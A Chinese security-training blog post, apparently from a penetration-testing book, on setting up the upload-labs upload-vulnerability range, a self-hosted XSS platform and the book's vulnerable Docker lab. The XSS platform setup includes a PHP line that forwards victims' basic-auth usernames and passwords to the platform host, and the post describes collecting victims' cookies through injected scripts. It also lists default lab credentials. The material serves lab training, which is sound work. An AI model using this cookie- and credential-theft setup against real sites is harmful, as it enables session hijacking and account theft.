首页 > 其他分享 >最新搭建upload-labs和XSS漏洞测试平台

最新搭建upload-labs和XSS漏洞测试平台

时间:2023-12-25 15:15:04浏览次数:31  
标签:XSS 55.6 upload labs 漏洞 10.211

搭建upload-labs

upload-labs是一个使用PHP语言编写的、专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场,旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含不同的上传方式。GitHub仓库为c0ny1/upload-labs/,推荐使用Windows系统,因为除了Pass-19必须在Linux系统中运行,其余Pass都可以在Windows系统中运行。可以参考GitHub页面上的说明进行安装。Docker的安装命令如下:

docker pull c0ny1/upload-labsdocker run -it -p 8003:80 c0ny1/upload-labs

安装界面如图2-12所示。

 

 图2-12

 

通过访问10.211.55.6:8003(127.0.0.1也是本机IP地址,所以也可通过127.0.0.1:8003访问),就可以访问upload-labs的界面,如图2-13所示。

 

 图2-13

 

 

 

搭建XSS测试平台

XSS测试平台是测试XSS漏洞获取Cookie并接收Web页面的平台,XSS可以做JavaScript能做的所有事情,包括但不限于窃取Cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息(如浏览器信息、IP地址)等。

下载本书源码,找到xss_platform目录,笔者的IP地址是10.211.55.6,因此将以下文件代码中的IP地址修改为10.211.55.6。

/db/xssplatform.sqlUPDATE oc_module SET code=REPLACE(code,'xsser.me','10.211.55.6:8004');

/xss/authtest.phpheader("Location: http://10.211.55.6:8004/index.php?do=api&id={$_GET['id']}&username={$_SERVER[PHP_AUTH_USER]}&password={$_SERVER[PHP_AUTH_PW]}");

/xss/config.php'urlroot' => 'http://10.211.55.6:8004'

然后在xss_platform目录下执行docker-compose up命令,通过访问10.211.55. 6:8004/index.php,就可以访问XSS平台的界面,如图2-14所示。

 

 图2-14

 

用户名和密码分别为admin和123456,也可以自行注册一个账号。登录后,在“我的项目”中单击右上角的“创建”按钮;输入名称,单击“下一步”按钮;然后勾选需要的模块,这里只选择“默认模块”;最后单击“下一步”按钮就创建好了项目,如图2-15所示。

 

 

图2-15

 

项目代码中给出了使用的脚本,只需要在存在XSS漏洞的页面处触发该脚本,XSS测试平台就可以接收被攻击者的Cookie信息,如图2-16和图2-17所示。

 

 图2-16

 

 

图2-17




搭建本书漏洞测试环境

下载源码(books.ms08067.com/tool.html),在目录vul下执行docker-compose up命令就可以运行本书的漏洞环境,如图2-18所示。

 

 

图2-18

 

笔者的主机IP地址是10.211.55.6,访问phpMyAdmin管理数据库的链接为10.211.55.6: 8080,服务器、用户名和密码分别为db、root和123456,如图2-19所示。

 

 

图2-19

 

phpMyAdmin登录成功后的界面如图2-20所示。

 

 

图2-20

 

漏洞测试环境的链接为10.211.55.6。打开该链接后,可以分别访问每个小节对应的漏洞,如图2-21所示。

 

 图2-21 

 

 

Ms08067安全实验室专注于网络安全知识的普及和培训,是专业的“图书出版+培训”的网络安全在线教育平台,专注于网络安全领域中高端人才培养。

平台已开设Web安全零基础就业,Web高级安全攻防进阶,红队实战攻防特训,Java代码安全审计,恶意代码分析与免杀实战,CTF基础实战特训营,网络安全应急响应,安全工具开发,AI与网络安全等系统培训课程。实验室出版安全图书《Web安全攻防:渗透测试实战指南》、《内网安全攻防:渗透测试实战指南》、《Python安全攻防:渗透测试实战指南》、《Java代码审计:入门篇》等。

 

扫描客服微信 获取更多课件+学习资料

标签:XSS,55.6,upload,labs,漏洞,10.211
From: https://www.cnblogs.com/ms08067/p/17926117.html

相关文章

  • 猜数字首页wxss代码
    /* index.wxss */.container {  display: flex;  flex-direction: column;  align-items: center;  /* 弹性布局,均匀分布 */  justify-content: center;  /* %基于父容器  vh相对于整个页面的高度 */  height: 100vh;  /* text-align: center; */......
  • 如何通过蛋壳Uploader把ipa文件上传到App Store教程步骤
    在移动应用开发的过程中,将ipa文件上传至AppStore是非常关键的一环。对于那些没有Mac电脑的开发者来说,这一步骤可能会成为一个挑战。幸运的是,有一个名为“蛋壳Uploader”的在线工具,可以帮助开发者在没有Mac的情况下,轻松上传ipa文件到AppStore。一、准备工作在使用蛋壳Uploader......
  • el-upload批量上传,获取第一个数据返回参数并在后面的上传中进行传递;递归
    fileChange(file,fileList){const{raw}=file;if(file.status!='ready')return;if(file.size/1024/1024>100){this.$message.error('文件大小不能超过100M');returnfalse;} this.upFileList=[]for(letx......
  • 最新Docker搭建DVWA和SQLi-LABS漏洞练习平台
    搭建DVWADVWA是一款开源的渗透测试漏洞练习平台,内含XSS、SQL注入、文件上传、文件包含、CSRF和暴力破解等漏洞的测试环境。可以在Docker Hub上搜索DVWA,有多个用户共享了搭建好的DVWA镜像(注意,有些镜像可能存在后门),此处选择镜像——sagikazarmark/dvwa,安装命令如下:docker pull......
  • Vue使用vue-simple-uploader上传文件夹
    Vue使用vue-simple-uploader上传文件夹先睹为快1点击上传“上传文件夹”按钮 2选择文件夹 3确定上传 4上传进度 引入控件installnpminstallvue-simple-uploader--savemain.js配置importuploaderfrom'vue-simple-uploader'Vue.use(uploader)vue......
  • el-upload组件报TypeError: Cannot create property ‘uid‘ on string错误解决方法
      今天发现使用el-upload上传文件,上传没有问题,点详情看文件时就会报一个错误,错误如下:TypeError:Cannotcreateproperty‘uid’onstring‘https://xxxx.com/upload/20230506/1683346602758.png’ 上传多张图片传值是['/service/soilTesting',/service/soilTest......
  • 图片上传 el-upload 单个图片写法
      上传单个图片:template:<el-form-itemlabel="上传图片"prop="result">      <el-upload       v-if="!formList.result"       class="upload-demo"       action='/api/jsonws/dlapp/ad......
  • Rails ActionDispatch::Http::UploadedFile to File
    RailsでFileをActionDispatch::Http::UploadedFileに変換する方法require'mime/types'File.open(path)do|file|filename=File.basename(file.path),ActionDispatch::Http::UploadedFile.new(filename:filename,type:MIME::Types.type_for(filename).first......
  • element ui中同级button调用upload组件
    代码<el-uploadref="schoolLogo"class="avatar-uploader"action="https://jsonplaceholder.typicode.com/posts/":show-file-list="false":on-success="handleAvatarSuccess":before-u......
  • xss-labs
    xss-labsp1.直接绕过​​直接在name后面=<script>alert(1)</script>p2.闭合前面绕过题目:在链接中插入script代码,如下图所示,并没有成功展示审查元素,可知一些符号被过滤成<所以没有成功执行再仔细看script代码其实已经写入在另一个地方,但由于双引号原因没有执行,所以我们......